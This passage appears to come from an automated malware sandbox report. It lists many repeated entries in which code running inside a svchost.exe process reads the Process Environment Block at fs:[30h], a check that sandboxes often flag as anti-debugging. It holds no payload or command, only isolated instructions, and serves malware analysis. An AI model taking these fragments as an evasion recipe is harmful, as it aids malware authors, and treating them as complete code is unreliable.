Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03034260 mov eax, dword ptr fs:[00000030h]	3_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03034260 mov eax, dword ptr fs:[00000030h]	3_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0302826B mov eax, dword ptr fs:[00000030h]	3_2_0302826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]	3_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]	3_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]	3_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]	3_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]	3_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]	3_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]	3_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]	3_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]	3_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]	3_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]	3_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]	3_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306E284 mov eax, dword ptr fs:[00000030h]	3_2_0306E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306E284 mov eax, dword ptr fs:[00000030h]	3_2_0306E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B0283 mov eax, dword ptr fs:[00000030h]	3_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B0283 mov eax, dword ptr fs:[00000030h]	3_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B0283 mov eax, dword ptr fs:[00000030h]	3_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030C62A0 mov eax, dword ptr fs:[00000030h]	3_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030C62A0 mov ecx, dword ptr fs:[00000030h]	3_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030C62A0 mov eax, dword ptr fs:[00000030h]	3_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030C62A0 mov eax, dword ptr fs:[00000030h]	3_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030C62A0 mov eax, dword ptr fs:[00000030h]	3_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030C62A0 mov eax, dword ptr fs:[00000030h]	3_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_031062D6 mov eax, dword ptr fs:[00000030h]	3_2_031062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030402E1 mov eax, dword ptr fs:[00000030h]	3_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030402E1 mov eax, dword ptr fs:[00000030h]	3_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030402E1 mov eax, dword ptr fs:[00000030h]	3_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030DE10E mov eax, dword ptr fs:[00000030h]	3_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030DE10E mov ecx, dword ptr fs:[00000030h]	3_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030DE10E mov eax, dword ptr fs:[00000030h]	3_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030DE10E mov eax, dword ptr fs:[00000030h]	3_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030DE10E mov ecx, dword ptr fs:[00000030h]	3_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030DE10E mov eax, dword ptr fs:[00000030h]	3_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030DE10E mov eax, dword ptr fs:[00000030h]	3_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030DE10E mov ecx, dword ptr fs:[00000030h]	3_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030DE10E mov eax, dword ptr fs:[00000030h]	3_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030DE10E mov ecx, dword ptr fs:[00000030h]	3_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030DA118 mov ecx, dword ptr fs:[00000030h]	3_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030DA118 mov eax, dword ptr fs:[00000030h]	3_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030DA118 mov eax, dword ptr fs:[00000030h]	3_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030DA118 mov eax, dword ptr fs:[00000030h]	3_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030F0115 mov eax, dword ptr fs:[00000030h]	3_2_030F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03060124 mov eax, dword ptr fs:[00000030h]	3_2_03060124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030C4144 mov eax, dword ptr fs:[00000030h]	3_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030C4144 mov eax, dword ptr fs:[00000030h]	3_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030C4144 mov ecx, dword ptr fs:[00000030h]	3_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030C4144 mov eax, dword ptr fs:[00000030h]	3_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030C4144 mov eax, dword ptr fs:[00000030h]	3_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0302C156 mov eax, dword ptr fs:[00000030h]	3_2_0302C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030C8158 mov eax, dword ptr fs:[00000030h]	3_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03036154 mov eax, dword ptr fs:[00000030h]	3_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03036154 mov eax, dword ptr fs:[00000030h]	3_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03104164 mov eax, dword ptr fs:[00000030h]	3_2_03104164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03104164 mov eax, dword ptr fs:[00000030h]	3_2_03104164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03070185 mov eax, dword ptr fs:[00000030h]	3_2_03070185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030EC188 mov eax, dword ptr fs:[00000030h]	3_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030EC188 mov eax, dword ptr fs:[00000030h]	3_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030D4180 mov eax, dword ptr fs:[00000030h]	3_2_030D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030D4180 mov eax, dword ptr fs:[00000030h]	3_2_030D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B019F mov eax, dword ptr fs:[00000030h]	3_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B019F mov eax, dword ptr fs:[00000030h]	3_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B019F mov eax, dword ptr fs:[00000030h]	3_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B019F mov eax, dword ptr fs:[00000030h]	3_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0302A197 mov eax, dword ptr fs:[00000030h]	3_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0302A197 mov eax, dword ptr fs:[00000030h]	3_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0302A197 mov eax, dword ptr fs:[00000030h]	3_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030F61C3 mov eax, dword ptr fs:[00000030h]	3_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030F61C3 mov eax, dword ptr fs:[00000030h]	3_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	3_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	3_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]	3_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	3_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	3_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_031061E5 mov eax, dword ptr fs:[00000030h]	3_2_031061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030601F8 mov eax, dword ptr fs:[00000030h]	3_2_030601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B4000 mov ecx, dword ptr fs:[00000030h]	3_2_030B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030D2000 mov eax, dword ptr fs:[00000030h]	3_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030D2000 mov eax, dword ptr fs:[00000030h]	3_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030D2000 mov eax, dword ptr fs:[00000030h]	3_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030D2000 mov eax, dword ptr fs:[00000030h]	3_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030D2000 mov eax, dword ptr fs:[00000030h]	3_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030D2000 mov eax, dword ptr fs:[00000030h]	3_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030D2000 mov eax, dword ptr fs:[00000030h]	3_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030D2000 mov eax, dword ptr fs:[00000030h]	3_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0304E016 mov eax, dword ptr fs:[00000030h]	3_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0304E016 mov eax, dword ptr fs:[00000030h]	3_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0304E016 mov eax, dword ptr fs:[00000030h]	3_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0304E016 mov eax, dword ptr fs:[00000030h]	3_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0302A020 mov eax, dword ptr fs:[00000030h]	3_2_0302A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0302C020 mov eax, dword ptr fs:[00000030h]	3_2_0302C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030C6030 mov eax, dword ptr fs:[00000030h]	3_2_030C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03032050 mov eax, dword ptr fs:[00000030h]	3_2_03032050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B6050 mov eax, dword ptr fs:[00000030h]	3_2_030B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0305C073 mov eax, dword ptr fs:[00000030h]	3_2_0305C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303208A mov eax, dword ptr fs:[00000030h]	3_2_0303208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030280A0 mov eax, dword ptr fs:[00000030h]	3_2_030280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030C80A8 mov eax, dword ptr fs:[00000030h]	3_2_030C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030F60B8 mov eax, dword ptr fs:[00000030h]	3_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030F60B8 mov ecx, dword ptr fs:[00000030h]	3_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B20DE mov eax, dword ptr fs:[00000030h]	3_2_030B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]	3_2_0302A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030380E9 mov eax, dword ptr fs:[00000030h]	3_2_030380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B60E0 mov eax, dword ptr fs:[00000030h]	3_2_030B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0302C0F0 mov eax, dword ptr fs:[00000030h]	3_2_0302C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030720F0 mov ecx, dword ptr fs:[00000030h]	3_2_030720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306C700 mov eax, dword ptr fs:[00000030h]	3_2_0306C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03030710 mov eax, dword ptr fs:[00000030h]	3_2_03030710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03060710 mov eax, dword ptr fs:[00000030h]	3_2_03060710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306C720 mov eax, dword ptr fs:[00000030h]	3_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306C720 mov eax, dword ptr fs:[00000030h]	3_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306273C mov eax, dword ptr fs:[00000030h]	3_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306273C mov ecx, dword ptr fs:[00000030h]	3_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306273C mov eax, dword ptr fs:[00000030h]	3_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030AC730 mov eax, dword ptr fs:[00000030h]	3_2_030AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306674D mov esi, dword ptr fs:[00000030h]	3_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306674D mov eax, dword ptr fs:[00000030h]	3_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306674D mov eax, dword ptr fs:[00000030h]	3_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03030750 mov eax, dword ptr fs:[00000030h]	3_2_03030750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030BE75D mov eax, dword ptr fs:[00000030h]	3_2_030BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072750 mov eax, dword ptr fs:[00000030h]	3_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072750 mov eax, dword ptr fs:[00000030h]	3_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B4755 mov eax, dword ptr fs:[00000030h]	3_2_030B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03038770 mov eax, dword ptr fs:[00000030h]	3_2_03038770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]	3_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]	3_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]	3_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]	3_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]	3_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]	3_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]	3_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]	3_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]	3_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]	3_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]	3_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03040770 mov eax, dword ptr fs:[00000030h]	3_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030D678E mov eax, dword ptr fs:[00000030h]	3_2_030D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030307AF mov eax, dword ptr fs:[00000030h]	3_2_030307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030E47A0 mov eax, dword ptr fs:[00000030h]	3_2_030E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303C7C0 mov eax, dword ptr fs:[00000030h]	3_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B07C3 mov eax, dword ptr fs:[00000030h]	3_2_030B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030527ED mov eax, dword ptr fs:[00000030h]	3_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030527ED mov eax, dword ptr fs:[00000030h]	3_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030527ED mov eax, dword ptr fs:[00000030h]	3_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030BE7E1 mov eax, dword ptr fs:[00000030h]	3_2_030BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030347FB mov eax, dword ptr fs:[00000030h]	3_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030347FB mov eax, dword ptr fs:[00000030h]	3_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030AE609 mov eax, dword ptr fs:[00000030h]	3_2_030AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0304260B mov eax, dword ptr fs:[00000030h]	3_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0304260B mov eax, dword ptr fs:[00000030h]	3_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0304260B mov eax, dword ptr fs:[00000030h]	3_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0304260B mov eax, dword ptr fs:[00000030h]	3_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0304260B mov eax, dword ptr fs:[00000030h]	3_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0304260B mov eax, dword ptr fs:[00000030h]	3_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0304260B mov eax, dword ptr fs:[00000030h]	3_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072619 mov eax, dword ptr fs:[00000030h]	3_2_03072619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0304E627 mov eax, dword ptr fs:[00000030h]	3_2_0304E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03066620 mov eax, dword ptr fs:[00000030h]	3_2_03066620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03068620 mov eax, dword ptr fs:[00000030h]	3_2_03068620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303262C mov eax, dword ptr fs:[00000030h]	3_2_0303262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0304C640 mov eax, dword ptr fs:[00000030h]	3_2_0304C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030F866E mov eax, dword ptr fs:[00000030h]	3_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030F866E mov eax, dword ptr fs:[00000030h]	3_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306A660 mov eax, dword ptr fs:[00000030h]	3_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306A660 mov eax, dword ptr fs:[00000030h]	3_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03062674 mov eax, dword ptr fs:[00000030h]	3_2_03062674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03034690 mov eax, dword ptr fs:[00000030h]	3_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03034690 mov eax, dword ptr fs:[00000030h]	3_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306C6A6 mov eax, dword ptr fs:[00000030h]	3_2_0306C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030666B0 mov eax, dword ptr fs:[00000030h]	3_2_030666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]	3_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306A6C7 mov eax, dword ptr fs:[00000030h]	3_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	3_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	3_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	3_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	3_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B06F1 mov eax, dword ptr fs:[00000030h]	3_2_030B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B06F1 mov eax, dword ptr fs:[00000030h]	3_2_030B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030C6500 mov eax, dword ptr fs:[00000030h]	3_2_030C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03104500 mov eax, dword ptr fs:[00000030h]	3_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03104500 mov eax, dword ptr fs:[00000030h]	3_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03104500 mov eax, dword ptr fs:[00000030h]	3_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03104500 mov eax, dword ptr fs:[00000030h]	3_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03104500 mov eax, dword ptr fs:[00000030h]	3_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03104500 mov eax, dword ptr fs:[00000030h]	3_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03104500 mov eax, dword ptr fs:[00000030h]	3_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03040535 mov eax, dword ptr fs:[00000030h]	3_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03040535 mov eax, dword ptr fs:[00000030h]	3_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03040535 mov eax, dword ptr fs:[00000030h]	3_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03040535 mov eax, dword ptr fs:[00000030h]	3_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03040535 mov eax, dword ptr fs:[00000030h]	3_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03040535 mov eax, dword ptr fs:[00000030h]	3_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0305E53E mov eax, dword ptr fs:[00000030h]	3_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0305E53E mov eax, dword ptr fs:[00000030h]	3_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0305E53E mov eax, dword ptr fs:[00000030h]	3_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0305E53E mov eax, dword ptr fs:[00000030h]	3_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0305E53E mov eax, dword ptr fs:[00000030h]	3_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03038550 mov eax, dword ptr fs:[00000030h]	3_2_03038550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03038550 mov eax, dword ptr fs:[00000030h]	3_2_03038550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306656A mov eax, dword ptr fs:[00000030h]	3_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306656A mov eax, dword ptr fs:[00000030h]	3_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306656A mov eax, dword ptr fs:[00000030h]	3_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03032582 mov eax, dword ptr fs:[00000030h]	3_2_03032582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03032582 mov ecx, dword ptr fs:[00000030h]	3_2_03032582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03064588 mov eax, dword ptr fs:[00000030h]	3_2_03064588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306E59C mov eax, dword ptr fs:[00000030h]	3_2_0306E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B05A7 mov eax, dword ptr fs:[00000030h]	3_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B05A7 mov eax, dword ptr fs:[00000030h]	3_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B05A7 mov eax, dword ptr fs:[00000030h]	3_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030545B1 mov eax, dword ptr fs:[00000030h]	3_2_030545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030545B1 mov eax, dword ptr fs:[00000030h]	3_2_030545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306E5CF mov eax, dword ptr fs:[00000030h]	3_2_0306E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306E5CF mov eax, dword ptr fs:[00000030h]	3_2_0306E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030365D0 mov eax, dword ptr fs:[00000030h]	3_2_030365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306A5D0 mov eax, dword ptr fs:[00000030h]	3_2_0306A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306A5D0 mov eax, dword ptr fs:[00000030h]	3_2_0306A5D0
